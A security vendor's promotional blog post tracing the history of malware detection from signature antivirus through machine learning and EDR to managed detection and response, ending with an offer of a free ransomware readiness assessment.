Our Blog | ActZero

MDR: An Origin Story | ActZero

Written by Sean Hittel | Jul 12, 2022 4:00:00 AM

A hero's origin story usually accounts for the source of two things: their power, and their motivation. Often, the audience is already familiar with the hero’s current state. But, what is interesting about these stories is the context from the backstory, and how it enables a great advantage in the present, where the challenges the hero faces are even more extreme… This story, about Managed Detection and Response (MDR), is no exception.

Read on for an insider look at MDR, followed by a harrowing tale of how we got here over the last 25 years. My primary focus will be on the technological and tactical advances that brought MDR the capabilities it has today - because the motivation, to anybody who has read any recent news about ransomware and other advanced persistent threats (APTs), is obvious.

The Managed Detection and Response (MDR) space is characterized by expert use of detection and response technologies on the endpoint (EDR), the network (NDR) and in the cloud. MDR done right involves teams of security engineers, developers, threat hunters and data scientists processing huge volumes of event data to find and anticipate today’s financially-motivated attackers. It also involves distilling this expert analysis into action, digestible by all to resource-constrained administrators

From a technical perspective, in its current form, MDR is a response to attackers using techniques such as Living Off the Land (LOtL) and human-at-keyboard to make automated detection difficult. From a market standpoint, MDR is an evolution to provide organizations that can not stand up teams of specialists themselves (whether due to capacity or expertise) with the necessary expertise and skill sets to wield the advanced tools required to combat today’s threats - just as the hero defends those who cannot defend themselves. How did we get to such a complex battlefield that requires such a complex solution?

The Attacker-Defender Coevolution

I’ve been fortunate enough to have been employed in the computer security field since the late 90s. It has long been both a hobby and a career. Something about the attacker-defender coevolution keeps my interest piqued. While a lot has changed over that time, the technical battle, and its resulting solutions’ confrontation with the marketplace, have not. Often one detection technology begets a new attack paradigm, whose solution creates a new product in the marketplace, whose adoption drives a new technique, tactic or procedure. Such iteration makes cybersecurity an exciting field in terms of attack evolution, technology co-evolution, and marketplace readiness. When I first started using ML in security in the late 90s, we mostly called it statistics, or anomaly detection. Though the techniques were largely the same, by 2012 we had vendors simply stating they used ML as their value proposition. By about 2015 vendors at RSA were basically standing on their tables and yelling "we have more machine learning" at passers by. Shortly thereafter, the proof of ML value became more complex with customers demanding more from each solution.

This attacker-defender coevolution can be seen in cases like ransomware’s use of blockchain. Ransomware attackers have existed since as early as 1989, but didn’t really have the level of impact they do today until they could be paired with the decentralized and confidential nature of the blockchain. Similarly, the human-detection engine symbiote coevolved with the attackers. As attackers learn strategic ways of evading detection engines, and their human analysts, the defensive stack improved its efficacy to keep up with the new threats. 

The Year of the Virus: The Shift from Static to Dynamic Attacks

Prior to about 2001, malware was largely a static binary. Authors would compile once, and the version of the virus would remain constant until the next compile. One static file. One static detection. There were certainly techniques such as polymorphism talked about among attackers, but they were largely theoretical, and weren’t huge issues for defenders. By about mid-2001, however, malware authors understood they could evade the signature and heuristic-based state of the art AV systems of the day using polymorphism, and deployed the technique frequently enough to cause major problems for AV vendors. Think of threat actors as “the bad guys” and traditional prevention technology vendors as “the police” in the context of our hero analogy. The hero evolves to suit a need that our everyday defenders can’t overcome.

Malware authors also discovered they could worm their creations. This led to the famous Code Red, Nimda, and Klez worm families of the day. These news-grabbing worms spread across the internet extremely rapidly saturating all vulnerable endpoints, keeping security response teams pagers buzzing, and marketing departments on their toes to be sure the public understood the threats, and the defender successes. This was an exciting time. The time from attack release, to a defender's first discovery, to first blog about it was often graded in minutes.

At this time, a detection would look for a hash (digital fingerprint of sorts), for a specific set of fixed bytes, or for which imports were included, or particular file size ranges. Attackers were so far ahead of defender detection technology that AV vendor’s security response teams were logging enormous amounts of overtime to try to keep up. During this period, security teams were just treading water in a fast-moving river. Attackers were causing such problems for anti-virus (AV) engines that media outlets dubbed 2001 “The year of the virus.”

From an economic standpoint, what polymorphism meant was it was very cheap (automatic) for attackers to generate a new malware sample that was functionally identical to its predecessors, but could evade signature and heuristic-based AV, easily. Attackers seemed to have every advantage. What worming meant was the attacker didn’t have to take any of the risk, or cost of distributing a new sample. The attack distributed itself.

The Machine-learning Reprise

The response to this was that AV vendors began investing in ML (or AI, depending on which marketing department one speaks with ;) ). They also began investing in behavioral protection – measuring what the attack does while executing - its behavior, not the components of the file at rest on disk. Though initially this behavioral detection was aimed at analyzing processes, this detection strategy in itself led to fields including today’s User and Entity Behavior Analytics (UEBA).

By around 2006, AV vendors again had the upper hand. This was made evident in the organizational and conference hallways seeing well-rested detection-engine engineers and security response folks holding their heads high.

A malware-detection stack of the day would include ML algorithms like random forests that convicted files based on thousands of attributes of files-at-rest or processes-at-execution. Signature-based detections still existed, but they were often automatically generated. These automatic signature generation systems often used ML extensively in themselves.

In our superhero analogy, machine learning algorithms are like Batman’s toolbelt. Selection of the right tool for the job is tremendously important, and it takes a skilled, practiced operator to use them effectively.

AV vendors spent much of the time between 2006 and 2012 growing their ML skills and including more advanced ML/AI systems using algorithms like Support-Vector Machine (SVM), regression, and clustering as well as ensemble systems and deep learning. The scale of data processed also ballooned as data hungry ML algorithms and efficacy teams sought ever more event telemetry to help predict what the next malware would look like.

I remember one hallway conversation where we realized that we had crossed the threshold of one uniquely behaving malware sample for each human. :0

Economic Advantage to Hackers

This was also the period where financially-motivated malware really took off. Browser exploitation systems, Business Email Compromise (BEC) and ransomware attackers were deeply vested in avoiding these advanced ML/AI systems.

Game on!

Among other things, attackers realized the cost to detection vendors of a false positive – for each false positive, the vendor would have to analyze the root cause deeply and explain it to their customer. This often happened with competing vendors feeding their prospective solution to the end user simultaneously. To make matters worse, attackers understood they could cause false positives cheaply. 

Attackers would use packers that were also used in legitimate software to wrap their malware, and submit it broadly to malware sample intake systems. The detection creation processes would happily consume these files, and release updated detections. The problem is, these updated detections would also false positive on the legitimate, and pseudo-legitimate potentially unwanted application (PUA). Exactly as the attackers intended - to distract defenders, and waste their resources. Remember, part of the hero’s job is to see past these red-herrings to focus on the true threat.

Attackers learned they could use economic factors to push around technology and AV vendors began letting attacks through as false negatives, while still collecting all the detection telemetry needed to evaluate the attacks as log events. Economic factors won out, and attackers again had the advantage.

Productization of Event Telemetry and Log Saturation

With this large source of event logs, and illustratable detection gaps well understood, astute marketeers saw the opportunity to expose these logs to the end user. This was the onset of the whole EDR space. The approach taken by EDR vendors is to provide the end user with raw event logs and let them deal with the false positives and the false negatives through analysis of this event data. To maximize effectiveness, EDR customers would have to regularly update their threat hunt queries to find recent evasive threats, and further refine these threat hunt queries with ever-evolving software configurations to address each emergent threat. Note that this makes big assumptions about defender organizations having (A) the people (B) with the right skills to operate the technology at scale. 

Then they would have to analyze the results of all these threat hunt queries. There can be hundreds or even thousands of log lines returned from each of these queries. The security analyst, suffering from alert fatigue, is faced with a decision to either ignore the events returned from the query, or sift through them. Since we are looking for rare attack events in seas of non-attack events, the security analyst is often incentivized to ignore these events and move on with other more productive tasks. While this is fine in most cases – when there is no attack resident, it also lets the attacks through, with the end result being the EDR doing little to solve the known evasion hole that the attackers were able to walk through with AV systems.

EDR was Not a Panacea

Though it isn’t perfect, this concept of offloading detection and refinement to end users via EDR solutions can work, so long as there is a qualified team running the EDR solution that has the time, skills and aptitude necessary to deeply leverage the power of the EDR system, as well as be able to configure and maintain it. And the spend to handle the log volume!

To further compound the problem, EDRs are high maintenance; High maintenance to build, High maintenance to deploy and High maintenance to investigate threats well.

To make matters worse, today’s attackers are well versed at evading near anything but the most diligently managed EDRs. They have long used techniques like Living Off the Land (LOtL), noise generators, dual use technology and human-at-keyboard active attacks to work around the very defenses EDR-based solutions are meant to provide.

Though these high-maintenance systems might be well suited for organizations with large security teams, what should those with smaller security teams do?

Going on the Offensive: MDR / XDR

Enter the next evolution in the attacker vs defender saga, MDR - Managed Detection and Response. Though it is possible to stand up the necessary teams to tune EDRs, to analyze the large quantities of data they produce looking for tiny attack needles in normal event haystacks, and to understand each attacker evolution, this is well beyond the abilities of anything but the most resourced of organizations.

ActZero believes that in most cases, it is better to have experts managing EDR solutions as a part of an MDR service to let customers focus on their business, not maintaining a complex set of tools. We do this via the expert tuning of tools like EDRs, deep data science and machine learning, end-to-end efficacy evaluations, and emergent threat handling to bring the necessary security suite to enable organizations to do what they do best in their domain. 

Ultimately, the hero is judged by their actions, not their words. Given the context described above, you may have some pretty lofty expectations about MDR right now - and you may be skeptical as to whether they are reachable. That is why we offer a Ransomware Readiness Assessment - at no cost to you - in which we test your security stack (and ours) against some particularly nasty, DarkWeb-sourced APTs. We evaluate Block-rate, dwell time, and signal-to-noise ratio across both solutions, and ultimately whether or not they stopped the objectives of the attacker campaign, on your in-production endpoint (without any risk of disruption). Sign up for an assessment today, to see how we have enabled a heroic advantage.